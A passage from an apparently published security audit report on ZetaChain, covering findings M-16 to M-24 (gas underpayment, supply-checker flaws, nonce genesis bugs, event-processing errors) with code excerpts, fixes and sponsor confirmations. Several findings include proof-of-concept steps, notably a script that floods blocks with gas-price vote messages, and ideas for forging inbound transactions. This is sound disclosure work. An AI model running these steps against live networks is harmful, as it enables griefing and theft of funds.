  1. Spam with the InTxTracker with a lot of transactions: Add transactions that will cause the zetaclients to fail/error while processing them -> this will cause the zetaclient to stop processing other legitimate messages in the ObserveTrackerSuggestions function. A tx with a hash that’s non-existent causes the zetaclient to error and stops the current loop iteration of the tracker tx’s
  2. Add an inbound transaction that does not have one of the desired contracts as the tx.To. This causes the zetaclients to vote for a “fake” transaction which could forge Deposit or ZetaSent events. Consequently, this allows draining funds.

Similarly, trusting observers to not misbehave with MsgAddToOutTxTracker messages imposes a trust issue as well.

Moreover, a single malicious observer can mess with the external chain nonces by using the (deprecated) MsgNonceVoter message, halting outbound cctx’s due to nonce mismatches.

Please note: This submission demonstrates the impact on cctxs while the “A single malicious observer can fill the block space with MsgGasPriceVoter messages without proper gas compensation resulting in griefing blocks” submission shows how the whole ZetaChain network (not only inbound/outbound cctx’s) can be significantly impacted (and griefed) by a single observer.

Re-consider the trust model of the MsgAddToInTxTracker and MsgAddToOutTxTracker messages and possibly also require a Merkle proof from observers.

lumtis (ZetaChain) confirmed

[M-16] Arbitrary destination gas limit for CoinType_Zeta cctxs results in paying lower gas fees

Submitted by berndartmueller, also found by zhaojie

Gas fees are underpaid for Zeta token cctx’s.

Proof of Concept

Outbound cctx’s are processed, collectively signed, and ultimately sent to the receiver chain by the observers via the TryProcessOutTx function.

The gas limit used for the transaction is specified in the cctx’s OutboundTxParams.OutboundTxGasLimit and validated in lines 375-382 to ensure the limit is in reasonable bounds and to prevent the transaction from failing due to insufficient gas.

Specifically, a lower limit of 100k is enforced in lines 375-378:

374: gasLimit := send.GetCurrentOutTxParam().OutboundTxGasLimit
375: if gasLimit < 100_000 {
376: 	gasLimit = 100_000
377: 	logger.Warn().Msgf("gasLimit %d is too low; set to %d", send.GetCurrentOutTxParam().OutboundTxGasLimit, gasLimit)
378: }

The fees for such outbound cctxs are paid and deducted from the transfer amount (InboundTxParams.Amount) by calling the PayGasAndUpdateCctx function in the following instances:

Cctx’s with the coin type CoinType_Gas or CoinType_ERC20 have the OutboundTxGasLimit gas limit overwritten by a hardcoded value, see lines 121 and 246.

However, cctx’s that transfer Zeta tokens, i.e., with the coin type CoinType_Zeta, do not have the gas limit overwritten, instead it is set to the value that was specified by the sender of the cctx. For example, by calling the ZetaConnectorEth.send function. This gas limit can be arbitrarily set and will be picked up by the observers and included in the MsgVoteOnObservedInboundTx message.

As a result, user’s can set the gas limit to the lowest possible value, 1 (0 is not possible due to Uniswap’s getAmountIn preventing zero amounts) so that the calculated gas fee for the outbound transaction is almost zero.

Once observers process the outbound transaction, the gas limit (set by the user to 1) is overwritten with the lower bound of 100k and broadcasted to the receiver chain.

Consequently, user’s can avoid paying the adequate gas fees for outbound Zeta token transactions and the TSS address will have to pay the gas fees instead.

For completeness it should be mentioned that a protocol fee of currently 2e18 Zeta tokens is charged. This offsets the insufficient gas fees paid by the user to some extent, however, it defeats the purpose of the gas fees and misuses the protocol fee.

Consider enforcing the minimum gas limit of 100k already in the PayGasInZetaAndUpdateCctx function in line 288.

lumtis (Zetachain) confirmed via duplicate Issue #240

[M-17] Zeta token supply checker incorrectly classifies in-transit cctxs as settled resulting in misleading checks

Submitted by berndartmueller

The Zeta token supply checker delivers false positives, suggesting that there is a Zeta token supply mismatch.

Proof of Concept

The GetPendingCCTXInTransit function in the ZetaSupplyChecker is supposed to return all cctxs that are currently in transit, i.e., cctxs that are pending and soon to be sent to the receiving chains. These pending cctx’s are then used to determine the amount of in-transit Zeta tokens (zetaInTransit), subsequently used in the ValidateZetaSupply function to check and validate the Zeta token supply.

Internally, the GetPendingCCTXInTransit function queries all pending cctxs for the receivingChains from the ZetaChain RPC in line 210. Thereafter, the cctxs are filtered in lines 221-233 by removing all cctxs that have been added to the OutTxTracker.

207: func (zs *ZetaSupplyChecker) GetPendingCCTXInTransit(receivingChains []common.Chain) []*types.CrossChainTx {
208: 	cctxInTransit := make([]*types.CrossChainTx, 0)
209: 	for _, chain := range receivingChains {
210: 		cctx, err := zs.zetaClient.GetAllPendingCctx(chain.ChainId)
211: 		if err != nil {
212: 			continue
213: 		}
214: 		nonceToCctxMap := make(map[uint64]*types.CrossChainTx)
215: 		for _, c := range cctx {
216: 			if c.GetInboundTxParams().CoinType == common.CoinType_Zeta {
217: 				nonceToCctxMap[c.GetCurrentOutTxParam().OutboundTxTssNonce] = c
218: 			}
219: 		}
221: 		trackers, err := zs.zetaClient.GetAllOutTxTrackerByChain(chain, Ascending)
222: 		if err != nil {
223: 			continue
224: 		}
225: 		for _, tracker := range trackers {
226: 			zs.logger.Info().Msgf("tracker exists for nonce: %d , removing from supply checks", tracker.Nonce)
227: 			delete(nonceToCctxMap, tracker.Nonce)
228: 		}
229: 		for _, c := range nonceToCctxMap {
230: 			if c != nil {
231: 				cctxInTransit = append(cctxInTransit, c)
232: 			}
233: 		}
234: 	}
235: 	return cctxInTransit
236: }

The reasoning for this is that once a cctx has been broadcasted to the receiver chain by the observers, the cctx is added to the OutTxTracker. As a result, the cctx is no longer considered to be in transit, the Zeta token supply on the receiver chain is updated (via minting or unlocking) and the update Zeta token supply is either included in the ethLockedAmount or externalChainTotalSupply.

However, the assumption that when a cctx is broadcasted to the receiver chain and included in the OutTxTracker, the cctx is no longer in transit is only partially correct. Once the transaction is broadcasted, it first stays in the EVM mempool until it is included in a block. Only then, the transaction is executed in the EVM, the state transition is applied and the Zeta token supply updated.

Consequently, the in-transit Zeta token is not correctly tracked, and the supply checker can not correctly validate the Zeta token supply.

I’m not entirely sure how to fix this issue and if it’s even viable to do so. Rather, the supply checker should be allowed to work with a margin of error, i.e., the supply checker should be allowed to be off by a certain amount of Zeta tokens.

DadeKuma (Lookout) commented:

Pending transactions in mempool might break the max supply invariant.

lumtis (ZetaChain) confirmed

[M-18] A single malicious observer can fill the block space with MsgGasPriceVoter messages without proper gas compensation resulting in griefing blocks

Submitted by berndartmueller

ZetaChain blocks can be griefed by a single observer, resulting in the block space being filled with MsgGasPriceVoter messages, preventing other transactions from being processed.

Proof of Concept

Observers submit the gas prices of the external (connected) chains by sending the MsgGasPriceVoter message to ZetaChain. This message is handled in the GasPriceVoter function.

The median gas price is then set in the zEVM’s system contract by calling the SetGasPrice function in line 174.

125: func (k msgServer) GasPriceVoter(goCtx context.Context, msg *types.MsgGasPriceVoter) (*types.MsgGasPriceVoterResponse, error) {
... 	// [...]
174: 	gasUsed, err := k.fungibleKeeper.SetGasPrice(
175: 		ctx,
176: 		chainIDBigINT,
177: 		math.NewUint(gasPrice.Prices[gasPrice.MedianIndex]).BigInt(),
178: 	)
179: 	if err != nil {
180: 		return nil, err
181: 	}
183: 	// reset the gas count
184: ❌ k.ResetGasMeterAndConsumeGas(ctx, gasUsed)
186: 	return &types.MsgGasPriceVoterResponse{}, nil
187: }

As this is a call to the zEVM (Evmos) and gas for this EVM call is accounted differently than gas in Cosmos SDK, the gas meter is reset in line 184 by calling the ResetGasMeterAndConsumeGas function to match the EVM’s gas consumption, i.e., consume the amount of gas the EVM has consumed instead of the Cosmos SDK gas.

206: // ResetGasMeterAndConsumeGas reset first the gas meter consumed value to zero and set it back to the new value
207: // 'gasUsed'
208: func (k *Keeper) ResetGasMeterAndConsumeGas(ctx sdk.Context, gasUsed uint64) {
209: 	// reset the gas count
210: 	ctx.GasMeter().RefundGas(ctx.GasMeter().GasConsumed(), "reset the gas count")
211: 	ctx.GasMeter().ConsumeGas(gasUsed, "apply evm transaction")
212: }

This is typically done by Evmos for MsgEthereumTx messages, as explained in the Evmos documentation - “Matching EVM Gas consumption”.

In this instance, the MsgGasPriceVoter message (sent by observers), specifically, the consumed gas, does not necessarily have to match the EVM gas model.

However, contrary to Evmos, the transaction’s gas meter is reset on every MsgGasPriceVoter message, ignoring the accumulated gas consumption for multiple messages within a Cosmos SDK transaction (Cosmos allows multiple messages per transaction).

Concretely, Evmos uses the accumulated gas used by multiple messages to ensure that the gas meter accounts for the gas consumed by all messages.

As a result, only the gas for the last MsgGasPriceVoter message is accounted for, and the gas for all previous messages is ignored, allowing the sender (observer) to send a high number of MsgGasPriceVoter messages and only paying the gas for a single message execution.

Consequently, a malicious observer can exploit this to grief ZetaChain blocks so that blocks are mostly filled with MsgGasPriceVoter messages (or any other messages that consume a lot of gas), preventing other transactions from being processed.

This represents a privilege escalation as single observes are not supposed to have such a significant impact on the ZetaChain’s block space, and thus, medium severity was chosen.

Please note: This submission demonstrates how the whole ZetaChain network (not only inbound/outbound cctxs) can be significantly impacted (and griefed) by a single observer. Contrary to the medium severity submission “Observer can halt outbound cctx’s and steal funds”, which only impacts outbound cctx’s.


This quick and dirty proof of concept should demonstrate that the transaction gas meter only consumes a single MsgGasPriceVoter message.

  1. Start a local ZetaChain environment with make start-smoke-test and wait until everything is started
  2. Access the zetacore0 docker container with docker exec -it zetacore0 sh
  3. Determine the observer address with zetacored keys show operator. Pick the address value and replace the subsequent OBSERVER_ADDRESS placeholder with it.
  4. Copy and paste the following bash script into a file called gas.sh:

# Number of times to repeat the message

# Address to be used

# Start of the JSON file
  "body": {
    "messages": ['

# Message template
        "@type": "/zetachain.zetacore.crosschain.MsgGasPriceVoter",
        "creator": "'$address'",
        "chain_id": "1337",
        "price": "10000000001",
        "block_number": "101",
        "supply": "100"

# End of the JSON file
    "memo": "",
    "timeout_height": "0",
    "extension_options": [],
    "non_critical_extension_options": []
  "auth_info": {
    "signer_infos": [],
    "fee": {
      "amount": [
          "denom": "azeta",
          "amount": "51803"
      "gas_limit": "518280",
      "payer": "",
      "granter": ""
    "tip": null
  "signatures": []

# Combine all parts

# Add the messages
for ((i=1; i<=$num_messages; i++))

  if (( i != num_messages ))


echo "$json" > gas.json
  1. chmod +x gas.sh and run with ./gas.sh 100 OBSERVER_ADDRESS. This will generate a transaction with 100 MsgGasPriceVoter messages and stores it in gas.json.
  2. Sign the transaction

    zetacored tx sign gas.json --from OBSERVER_ADDRESS --gas=auto --gas-prices=0.4azeta --gas-adjustment=20 --chain-id=athens_101-1 --keyring-backend=test -y --broadcast-mode=block > tx.signed.json
  3. Broadcast the transaction with zetacored tx broadcast tx.signed.json
  4. Query the transaction hash to determine the used gas. Replace HASH with the transaction hash from the previous step.

    zetacored q tx --type=hash HASH | grep "gas_used"
  5. Step 8 should print something like gas_used: "28704" (the actual value may vary). This is the total gas used by the transaction. However, this value should be much higher as the transaction contains 100 MsgGasPriceVoter messages. This indicates that the gas meter is reset on every MsgGasPriceVoter message (you can verify it by determining the gas usage from a single MsgGasPriceVoter)

Consider not resetting the gas meter for MsgGasPriceVoter messages.

lumtis (ZetaChain) confirmed

[M-19] Inbound transactions submitted to the InTxTracker that contain multiple ZetaSent and Deposited events are not processed correctly by the observers resulting in a loss of funds

Submitted by berndartmueller

Observers miss out on voting on multiple ZetaSent and ERC-20 Deposited events that have been emitted in a single transaction, resulting in a loss of funds.

Proof of Concept

Anyone can submit inbound transactions to ZetaChain’s InTxTracker via the MsgAddToInTxTracker message in case the transaction was missed by the observers in the first place to ensure the transaction is processed.

The AddToInTxTracker function handles the MsgAddToInTxTracker message and ensures that the submitted transaction is a valid inbound transaction by verifying the provided Merkle proof. Additionally, the transaction’s To address must be the corresponding ZetaChain contract address (e.g., connector address for the Zeta coin type, or the custody contract address for the ERC-20 coin type).

ZetaChain observers continuously query this InTxTracker in the ObserveTrackerSuggestions function.

If the submitted inbound transaction’s coin type is CoinType_Zeta, the CheckReceiptForCoinTypeZeta function iterates all logs contained in the transaction’s receipt, as seen in lines 156-164.

144: func (ob *EVMChainClient) CheckReceiptForCoinTypeZeta(txHash string, vote bool) (string, error) {
145: connector, err := ob.GetConnectorContract()
...  // [...]
155: var msg types.MsgVoteOnObservedInboundTx
156: for _, log := range receipt.Logs {
157: 	event, err := connector.ParseZetaSent(*log)
158: 	if err == nil && event != nil {
159: 		msg, err = ob.GetInboundVoteMsgForZetaSentEvent(event)
160: 		if err == nil {
161: ❌			break
162: 		}
163: 	}
164: }
...  // [...]
177: }

However, as soon as the first ZetaSent event is found and the corresponding MsgVoteOnObservedInboundTx message is successfully created, the for loop is exited in line 161 via the break statement.

Similarly, this also applies to the CheckReceiptForCoinTypeERC20 function in line 195, that processes Deposited events emitted by the ERC20Custody.deposit function.

As a consequence, if the transaction contains multiple ZetaSent events, only the first event is processed and voted upon in ZetaChain, and the other events are ignored.

Those ignored ZetaSent events are potentially never processed and the corresponding Zeta tokens that have been locked or burned in the connector contract are lost.

The use of “potentially” is due to the fact that the inbound transaction was missed by the observers (for any reason) in the first place, and therefore, the affected user submitted the transaction via the MsgAddToInTxTracker message.

Now the question is, how is it possible that multiple ZetaSent events are emitted when the transaction’s To address is the connector contract address?

This transaction could have been the result of a cross-chain message, and thus the ZetaConnectorEth.onReceive function is invoked. This function optionally calls the onZetaMessage function of the provided destinationAddress contract in lines 64-66.

52: function onReceive(
53:     bytes calldata zetaTxSenderAddress,
54:     uint256 sourceChainId,
55:     address destinationAddress,
56:     uint256 zetaValue,
57:     bytes calldata message,
58:     bytes32 internalSendHash
59: ) external override onlyTssAddress {
60:     bool success = IERC20(zetaToken).transfer(destinationAddress, zetaValue);
61:     if (!success) revert ZetaTransferError();
63:     if (message.length > 0) {
64:         ZetaReceiver(destinationAddress).onZetaMessage(
65:             ZetaInterfaces.ZetaMessage(zetaTxSenderAddress, sourceChainId, destinationAddress, zetaValue, message)
66:         );
67:     }
69:     emit ZetaReceived(zetaTxSenderAddress, sourceChainId, destinationAddress, zetaValue, message, internalSendHash);
70: }

Within this onZetaMessage function, the destination contract can repeatedly call the ZetaConnectorEth.send function to send cross-chain messages.

Et voilà, multiple ZetaSent events are emitted.

Similarly, this also applies for repeatedly calling the ERC20Custody.deposit function to deposit ERC-20 tokens.

Consider removing the break statement in lines 161 and 195, and instead, process and vote on all ZetaSent and Deposited events.

lumtis (ZetaChain) confirmed

[M-20] Lack of message ordering may lead to failed transactions

Submitted by berndartmueller

Cross-chain messages might be processed out-of-order, leading to failed transactions and dApps that are not working as expected.

Proof of Concept

Cross-chain messages can be sent between external chains by using the ZetaConnectorEth.send function. This function emits the ZetaSent event that is subsequently picked up by the ZetaChain observers and voted upon.

31: function send(ZetaInterfaces.SendInput calldata input) external override whenNotPaused {
32:     bool success = IERC20(zetaToken).transferFrom(msg.sender, address(this), input.zetaValueAndGas);
33:     if (!success) revert ZetaTransferError();
35:     emit ZetaSent(
36:         tx.origin,
37:         msg.sender,
38:         input.destinationChainId,
39:         input.destinationAddress,
40:         input.zetaValueAndGas,
41:         input.destinationGasLimit,
42:         input.message,
43:         input.zetaParams
44:     );
45: }

Such a cross-chain transaction is considered valid (finalized), once a quorum of observers has voted on the transaction and verified the legitimacy of the transaction. This process naturally takes a certain amount of time, as the observers wait for the including block (on the external chain) to be confirmed by a reasonable amount of subsequent blocks. Additionally, observers are not 100% synchronized, meaning that some observers might have seen the including block earlier than others.

As a result, cross-chain transactions, or inbound cctxs in general, are not guaranteed to be finalized in the order they were sent from the external chain.

This can lead to a situation where a contract on an external chain that sends two consecutive cross-chain messages and expects the second message to be processed after the first message, is not guaranteed to be processed in the correct order.

For example, consider the simplified example of a staking dApp which sends multiple consecutive cross-chain messages in the same block or transaction (please ignore the reasoning why a user would stake and immediately unstakes, this should just demonstrate the dependency on the order of the messages):

  1. stake
  2. unstake

Those two messages have to be in order. If message 2 (unstake) is executed before message 1 (stake), the transaction reverts on the destination chain as there is no stake to unstake.

Even if the dApp would incorporate a nonce in the cross-chain message, the receiving contract on the destination chain would reject the out-of-order message as the nonce is not the next expected nonce and revert the transaction.

Consider adding the option to enforce message ordering per sender and source chain, similar to LayerZero’s message ordering feature.

lumtis (ZetaChain) confirmed

[M-21] Inability to reliably verify inbound transactions may result in missed inbound transactions

Submitted by berndartmueller, also found by ChristiansWhoHack

Certain inbound transactions can not be added to the inbound transaction tracker due to the inability to verify their legitimacy, potentially resulting in missed inbound transactions.

Proof of Concept

Anyone can submit inbound transactions to ZetaChain’s InTxTracker via the MsgAddToInTxTracker message in case the transaction was missed by the observers in the first place, to ensure the transaction is processed.

The AddToInTxTracker function handles the MsgAddToInTxTracker message and ensures that the submitted transaction is a valid inbound transaction by verifying the provided block inclusion proof in line 28.

15: func (k msgServer) AddToInTxTracker(goCtx context.Context, msg *types.MsgAddToInTxTracker) (*types.MsgAddToInTxTrackerResponse, error) {
..    // [...]
26: 	isProven := false
27: 	if !(isAdmin || isObserver) && msg.Proof != nil {
28: 		txBytes, err := k.VerifyProof(ctx, msg.Proof, msg.ChainId, msg.BlockHash, msg.TxIndex)
29: 		if err != nil {
30: 			return nil, types.ErrProofVerificationFail.Wrapf(err.Error())
31: 		}
33: 		if common.IsEVMChain(msg.ChainId) {
34: 			err = k.VerifyEVMInTxBody(ctx, msg, txBytes)
35: 			if err != nil {
36: 				return nil, types.ErrTxBodyVerificationFail.Wrapf(err.Error())
37: 			}
38: 		} else {
39: 			return nil, types.ErrTxBodyVerificationFail.Wrapf(fmt.Sprintf("cannot verify inTx body for chain %d", msg.ChainId))
40: 		}
41: 		isProven = true
42: 	}
..    // [...]

After verifying if the transaction is included in the block, the transaction is checked if it is a valid inbound transaction by calling the VerifyEVMInTxBody function in line 34.

057: func (k Keeper) VerifyEVMInTxBody(ctx sdk.Context, msg *types.MsgAddToInTxTracker, txBytes []byte) error {
058: 	var txx ethtypes.Transaction
059: 	err := txx.UnmarshalBinary(txBytes)
060: 	if err != nil {
061: 		return err
062: 	}
063: 	if txx.Hash().Hex() != msg.TxHash {
064: 		return fmt.Errorf("want tx hash %s, got %s", txx.Hash().Hex(), msg.TxHash)
065: 	}
066: 	if txx.ChainId().Cmp(big.NewInt(msg.ChainId)) != 0 {
067: 		return fmt.Errorf("want evm chain id %d, got %d", txx.ChainId(), msg.ChainId)
068: 	}
069: 	switch msg.CoinType {
070: 	case common.CoinType_Zeta:
071: 		coreParams, found := k.zetaObserverKeeper.GetCoreParamsByChainID(ctx, msg.ChainId)
072: 		if !found {
073: 			return types.ErrUnsupportedChain.Wrapf("core params not found for chain %d", msg.ChainId)
074: 		}
075: 		if txx.To().Hex() != coreParams.ConnectorContractAddress {
076: 			return fmt.Errorf("receiver is not connector contract for coin type %s", msg.CoinType)
077: 		}
078: 		return nil
079: 	case common.CoinType_ERC20:
080: 		coreParams, found := k.zetaObserverKeeper.GetCoreParamsByChainID(ctx, msg.ChainId)
081: 		if !found {
082: 			return types.ErrUnsupportedChain.Wrapf("core params not found for chain %d", msg.ChainId)
083: 		}
084: 		if txx.To().Hex() != coreParams.Erc20CustodyContractAddress {
085: 			return fmt.Errorf("receiver is not erc20Custory contract for coin type %s", msg.CoinType)
086: 		}
087: 		return nil
088: 	case common.CoinType_Gas:
089: 		tss, err := k.GetTssAddress(ctx, &types.QueryGetTssAddressRequest{})
090: 		if err != nil {
091: 			return err
092: 		}
093: 		tssAddr := eth.HexToAddress(tss.Eth)
094: 		if tssAddr == (eth.Address{}) {
095: 			return fmt.Errorf("tss address not found")
096: 		}
097: 		if txx.To().Hex() != tssAddr.Hex() {
098: 			return fmt.Errorf("receiver is not tssAddress contract for coin type %s", msg.CoinType)
099: 		}
100: 		return nil
101: 	default:
102: 		return fmt.Errorf("coin type %s not supported", msg.CoinType)
103: 	}
104: }

The VerifyEVMInTxBody function checks in lines 75 and 84 if the transaction’s To address is the expected address for the given coin type. For example, if the coin type is common.CoinType_ERC20, the To address must match the address of the ERC20Custody contract. Otherwise, if the To address is not the expected address, the transaction is considered invalid and not added to the inbound transaction tracker.

However, this check is not sufficient to reliably determine if the transaction is a valid inbound tx.

Specifically, if the ERC20Custody.deposit function was called from another contract, thus the transaction’s To address is not the ERC20Custody contract address, the transaction can not be added to the tracker, even though it is a valid inbound transaction. Potentially resulting in a missed inbound transaction.

Similarly, the common.CoinType_Zeta coin type is also affected.

For completeness, I’d like to point out that for the common.CoinType_Gas coin type, if a contract sends native gas tokens to the TSS address, it is not possible to determine if the transaction is a valid inbound transaction.

Consider also allowing to provide the logged event (log) and the accompanying proof of the event inclusion by verifying the receipt merkle trie proof.

lumtis (ZetaChain) acknowledged

[M-22] Lagging median gas price when the set of observers changes

Submitted by berndartmueller, also found by deliriusz and p0wd3r

The median gas price used within ZetaChain may be inaccurate and lagging, causing outbound transactions to be underpriced and pending in the mempool and gas fees to be underpaid by users.

Proof of Concept

ZetaChain observers, i.e., zetaclients, watch the gas prices of the external chains and submit the current prices to ZetaChain by broadcasting the MsgGasPriceVoter message. This message is processed by the GasPriceVoter function in node/x/crosschain/keeper/keepergasprice.go#L125-L187.

Each observer’s gas price vote is stored in the GasPrice struct in the Prices array and the gas price is determined by using the median of the stored values in line 167.

The number of ZetaChain observers can increase or decrease over time, e.g., due to validator nodes exiting the network, slashing, or observers being removed/added by the admin.

This leads to an issue as there will be stale gas price “vote” entries in the GasPrice.Prices array that will affect the median calculation. As a result, the calculated gas price may be inaccurate and lag behind the actual gas price.

Consider the following example:

Given 9 observers and their gas price votes:

Observer Index 0 1 2 3 4 5 6 7 8
Gas Price 10 5 5 20 15 10 10 40 20

Sorting the gas prices in ascending order:

Observer Index 1 2 5 6 0 4 3 8 7
Gas Price 5 5 10 10 10 15 20 20 40

The median gas price is: 10 (from the observer with index 0)

Now, let’s assume that 4 of the observers (observers 0, 1, 2, 3 - marked with *) are inactive and do not submit gas price votes anymore. The remaining observers continue to submit gas prices (gas price spiked)

Observer Index 0* 1* 2* 3* 4 5 6 7 8
Gas Price 10* 5* 5* 20* 40 60 70 70 70

Sorting the gas prices in ascending order:

Observer Index 1* 2* 0* 3* 4 5 6 7 8
Gas Price 5* 5* 10* 20* 40 60 70 70 70

The median gas price is: 40 (from the observer with index 4)

As observers 0, 1, 2, and 3 are inactive, their stale gas price votes are still considered in the median calculation, leading to a lagging gas price. If we would ignore the inactive observers, the median gas price would be 70.

This can be mitigated by using the block height of the submitted gas price vote, stored in GasPrice.BlockNums and ignoring stale votes.

Consider filtering out stale gas price votes based on the block height of the vote to prevent lagging gas prices.

lumtis (ZetaChain) confirmed

[M-23] Incorrect genesis initialization of pending nonces

Submitted by berndartmueller

In case a ZetaChain node has been hard-reset or a hard fork is performed, the x/crosschain module’s InitGenesis function will initialize the pending nonces for all external chains to 0, diverging from the real pending, non-zero, nonces. Consequently, assigning the next available transaction nonce to a cctx via the UpdateNonce function will error, preventing the cctx from ever being processed.

Proof of Concept

The InitGenesis function in node/x/crosschain/genesis.go#L12-L73 initializes the chain nonces in lines 39-41 from the exported state. These nonces are possibly non-zero as they represent the next available transaction nonce for the chains.

38: // Set all the chain nonces
39: for _, elem := range genState.ChainNoncesList {
40: 	if elem != nil {
41: 		k.SetChainNonces(ctx, *elem)
42: 	}
43: }

Additionally, the pending nonces are initialized in lines 63-64, by setting the NonceLow and NonceHigh to 0.

59: if genState.Tss != nil {
60: 	k.SetTSS(ctx, *genState.Tss)
61: 	for _, chain := range common.DefaultChainsList() {
62: 		k.SetPendingNonces(ctx, types.PendingNonces{
63: ❌			NonceLow:  0,
64: ❌			NonceHigh: 0,
65: 			ChainId:   chain.ChainId,
66: 			Tss:       genState.Tss.TssPubkey,
67: 		})
68: 	}
69: 	for _, elem := range genState.TssHistory {
70: 		k.SetTSSHistory(ctx, elem)
71: 	}
72: }

However, as a chain’s transaction nonce is most probably non-zero (if there have been previous transactions), the pending nonces are initialized incorrectly.

As a result, the UpdateNonce function will error when checking if the NonceHigh nonce is equal to the next available Nonce in node/x/crosschain/keeper/cctx_utils.go#L44-L46 due to the p.NonceHigh being initialized to 0.

44: if p.NonceHigh != int64(nonce.Nonce) {
45: 	return cosmoserrors.Wrap(types.ErrNonceMismatch, fmt.Sprintf("chain_id %d, high nonce %d, current nonce %d", receiveChainID, p.NonceHigh, nonce.Nonce))
46: }

Consequently, this error has wide-ranging implications as the UpdateNonce function is called in many instances:

  1. Processing EVM transactions via the PostTxProcessing hook. Specifically, the UpdateNonce function is called in node/x/crosschain/keeper/evm_hooks.go#L254 and returns an error. Consequently, the EVM transaction is reverted.
  2. Attempting to refund a failed inbound cctx, see node/x/crosschain/keeper/keepercrosschaintxvoteinboundtx.go#L180. Consequently, the inbound cctx is aborted without refunding.
  3. Cross-chain messaging, see node/x/crosschain/keeper/keepercrosschaintxvoteinboundtx.go#L228. As a result, the inbound cross-chain cctx is aborted without refunding the sender or notifying the sender (contract) of the abort.
  4. Refunding a failed outbound cctx, see node/x/crosschain/keeper/keepercrosschaintxvoteoutboundtx.go#L194.
  5. Migrating funds from TSS addresses, see node/x/crosschain/keeper/msgmigratetss_funds.go#L133.
  6. Sending a command cctx to whitelist an ERC-20 token on an external chain. See node/x/crosschain/keeper/msgserverwhitelist_erc20.go#L146

In this scenario, there’s currently no functionality to recover from this error. The chain’s pending nonces can not be adjusted, and the only way to recover from this is by fixing the issue and having the chain’s validators update their nodes.

Test Case

The following simple test case demonstrates that the NonceHigh does not reflect the chain’s actual nonce:

Test case (click to reveal)
diff --git a/repos/node/x/crosschain/genesis_test.go b/repos/node/x/crosschain/genesis_test.go
index 994c83f..c959de1 100644
--- a/repos/node/x/crosschain/genesis_test.go
+++ b/repos/node/x/crosschain/genesis_test.go
@@ -1,6 +1,7 @@
 package crosschain_test

 import (
+	"fmt"

@@ -12,6 +13,8 @@ import (

 func TestGenesis(t *testing.T) {
+	chainNonce := int64(2)
 	genesisState := types.GenesisState{
 		Params: types.DefaultParams(),
 		OutTxTrackerList: []types.OutTxTracker{
@@ -28,7 +31,7 @@ func TestGenesis(t *testing.T) {
 		ChainNoncesList: []*types.ChainNonces{
 			sample.ChainNonces(t, "0"),
 			sample.ChainNonces(t, "1"),
-			sample.ChainNonces(t, "2"),
+			sample.ChainNonces(t, fmt.Sprintf("%d", chainNonce)),
 		CrossChainTxs: []*types.CrossChainTx{
 			sample.CrossChainTx(t, "0"),
@@ -51,6 +54,10 @@ func TestGenesis(t *testing.T) {
 	k, ctx, _, _ := keepertest.CrosschainKeeper(t)
 	crosschain.InitGenesis(ctx, *k, genesisState)
 	got := crosschain.ExportGenesis(ctx, *k)
+	pendingNonces, _ := k.GetPendingNonces(ctx, genesisState.Tss.TssPubkey, genesisState.ChainNoncesList[2].ChainId) // @audit-info 3rd chain with the nonce set to 2
+	require.Equal(t, chainNonce, pendingNonces.NonceHigh)                                                            // @audit-info fails, expected 2, got 0
 	require.NotNil(t, got)

 	// Compare genesis after init and export
--- FAIL: TestGenesis (0.01s)
        	Error Trace:	./2023-11-zetachain/repos/node/x/crosschain/genesis_test.go:59
        	Error:      	Not equal:
        	            	expected: 2
        	            	actual  : 0
        	Test:       	TestGenesis

How to run this test case:

Save git diff to a file in the root named test.patch and run with

git apply test.patch
cd repos/node
go test -v ./x/crosschain/genesis_test.go --run TestGenesis


=== RUN   TestGenesis
        	Error Trace:	/Users/bernd/Projects/crypto/audits/c4-2023-11-zetachain/repos/node/x/crosschain/genesis_test.go:59
        	Error:      	Not equal:
        	            	expected: 2
        	            	actual  : 0
        	Test:       	TestGenesis
--- FAIL: TestGenesis (0.01s)

Consider exporting the pending nonces in the ExportGenesis function and initialize the pending nonces state from it in the InitGenesis function.

lumtis (ZetaChain) confirmed

[M-24] Zeta Supply Inflation on Deploy Fungible Gas Coin

Submitted by ChristiansWhoHack

The Zetachain whitepaper part 7.3 is titled Comprehensive Defense Against Arbitrary Minting. In this section, there are mentioned security protections that ensure that the supply of Zeta remains the same across all chains. Within the zetaclient, there is even zetasupplychecker.go to ensure that this is the case. According to whitepaper, the total supply should remain the same across all chains with Ethereum being the home supply location. Finding #1 from the Halborn audit puts this as a clear risk as well.

However, this invariant is not always kept. First, the message DeployFungibleCoinZRC20 on a gas token creates a pool within SetupChainGasCoinAndPool. When creating this pool, a call to MintCoins() on the bankkeeper is made. This increases the amount of Zeta without destroying it anywhere, resulting in an inflation of ZETA tokens. This functionality is only callable by admins when new chains are created, but still breaks an important invariant within the system.

Besides increasing the ZETA tokens, it also creates some amount of the ZRC20 token, which may not exist in the TSS at the time. Having funds that are not backed by anything is very dangerous to do.


To run this PoC, do the following:

  1. Copy the code below into x/fungible/keeper/msg_server_deploy_fungible_coin_zrc20_test.go
  2. Add fmt to the list of imports at the top of the file.
  3. Within the node directory of the repo, run the following command: go test -v ./x/fungible/keeper -run TestMsgServer_IncreaseZetaAmount.
  4. Notice that the execution leads to an increase of ‘azeta’ without decreasing it anywhere else. This is shown by the asserts and print statements in the execution of the code.
func TestMsgServer_IncreaseZetaAmount(t *testing.T) {
	t.Run("Deploy token increases zeta amount", func(t *testing.T) {
		k, ctx, sdkk, zk := keepertest.FungibleKeeper(t)
		msgServer := keeper.NewMsgServerImpl(*k)
		k.GetAuthKeeper().GetModuleAccount(ctx, types.ModuleName)
		admin := sample.AccAddress()
		setAdminPolicies(ctx, zk, admin, observertypes.Policy_Type_group2)
		chainID := getValidChainID(t)

		deploySystemContracts(t, ctx, k, sdkk.EvmKeeper)

		zetaAmountBefore := sdkk.BankKeeper.GetSupply(ctx, "azeta")

		// Deploy a gas token
		_, err := msgServer.DeployFungibleCoinZRC20(ctx, types.NewMsgDeployFungibleCoinZRC20(
		assert.Equal(t, nil, err) // Call succeeds

		zetaAmountAfter := sdkk.BankKeeper.GetSupply(ctx, "azeta")
		assert.GreaterOrEqual(t, zetaAmountAfter.Amount.Int64(), zetaAmountBefore.Amount.Int64())

        fmt.Println("Supply Zeta Before:", zetaAmountBefore)
        fmt.Println("Supply Zeta After:", zetaAmountAfter)


To prevent the arbitrary creation of Zeta, funds should be taken from another place. Within the ecosystem, this could be done from any of the other chains, such as Ethereum and others. However, the easiest would be to take the funds from the community pool that lives on Zetachain.

This way, no funds are created out of thin air. This keeps the important invariant that the Zeta supply always stays the same throughout the entire ecosystem.

lumtis (ZetaChain) confirmed

